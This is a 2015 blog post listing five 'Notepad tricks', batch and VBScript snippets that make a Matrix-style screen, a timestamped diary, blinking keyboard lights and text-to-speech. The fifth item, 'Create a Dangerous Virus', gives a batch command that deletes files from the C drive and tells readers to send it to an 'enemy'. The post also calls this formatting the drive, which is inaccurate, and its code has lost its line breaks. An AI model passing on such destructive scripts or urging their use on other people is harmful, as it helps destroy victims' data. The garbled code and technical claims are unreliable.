Wednesday 4 February 2015

Top 5 Best Notepad Tricks

Notepad is just a simple text editor which is preloaded in every Windows version, that allows users to write or note something. Notepad is very helpful, if you are in a hurry and want to make a quick note. The files that you make using Notepad are generally saved as a txt files. Notepad is a very simple and light weight text editor program.



















Many People think that Notepad is nothing but a simple text editor but they don’t know that it is a very powerful tool that you can use to create different types of commands, hacks, opens many extensions files and also create your own batch file programs. So, today I am gonna show you the list of some very amazing Notepad tricks. So, without wasting much of your time, let’s get started with the top 5 best Notepad tricks.

 1. Matrix Effect

This is one of the best trick for all the fans of the Matrix movies. By using this trick you can create a matrix like effect in your Notepad. So, follow the steps to get started.
  • First of all, open Notepad
  • Now, paste the below given code in Notepad
@echo offcolor 02:startecho %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%goto start
  • After that, save this file as Matrix.bat
  • Then open it and see the magic!

2. Create Your Own Diary

In this trick, I will show you to create your own diary that whenever you write something in your diary then it will be saved automatically with a date and time. So, follow the below given steps to get started with the trick.
  • At first, open Notepad
  • Then, type .LOG in Notepad
  • Now, save that file as a Log.txt
  • Now, open it and type something in it, then you will see that it will automatically be saved with a specific time and date

3. Make Your Keyboard Lights Dance

This trick is one of the most amazing Notepad trick that will make your keyboard’s three lights (Num Lock, Caps Lock, Scroll Lock) on and off randomly, which will create a dancing light effect. So, follow the below given steps to get started.
  • First of all, open Notepad
  • Paste the below given code in your Notepad
Set wshShell =wscript.CreateObject(“WScript.Shell”)dowscript.sleep 100wshshell.sendkeys “{CAPSLOCK}”wshshell.sendkeys “{NUMLOCK}”wshshell.sendkeys “{SCROLLLOCK}”loop
  • Now, save that file as DancingLED.vbs
  • Then open it and you will see that all your keyboard lights will be turning on and off randomly, which will create a cool dancing light effect

4. Make Your PC Speak What You Type

In this trick, I will teach you that how to create a simple program that will speak what you type. By using this trick you will create a very simple program that will speak whatever you type in the given box. So, follow the below given steps to get started.
  • First of all, open Notepad
  • Then paste the below given code in Notepad
Dim message, sapimessage=InputBox(“What do you want me to say?”,”ATT Text To Speak”)Set sapi=CreateObject(“sapi.spvoice”)sapi.Speak message 

  • Now, save this file as Speak.vbs
  • Now, open it and then you will see a very simple program, in which you have to type anything you want and hit OK button to speak your computer

5. Create a Dangerous Virus

This trick is one of most amazing and the most dangerous trick, that will format your Windows C drive. Well, this dangerous virus is very simple and easy to create. So, follow the below given steps to get started.
  •  First, open Notepad and paste the below given code
@Echo offDel C:\ *.* |y
  • Now, save this file as Virus.bat
  • Send it to one of your enemy and his/her C drive would be formatted completely
Conclusion
So, this was the list of top 5 best Notepad tricks. I hope that these best tricks will definitely change your thinking about Notepad. If you have any queries regarding this article then do let us know, we will try our best to resolve them. And plus, if you’d like this article then do share this with your friends and circles too.

Written by

is one of the Team Member of Programmer vs Hacker. He has written many articles on this website and is a patner of this website.

3 comments:

We’re eager to see your comment. However, Please Keep in mind that comments are moderated manually by our human reviewers according to our comment policy, and all the links are nofollow. Using Keywords in the name field area is forbidden. Let’s enjoy a personal and evocative conversation.

© 2015 Programmer vs Hacker. All rights resevered.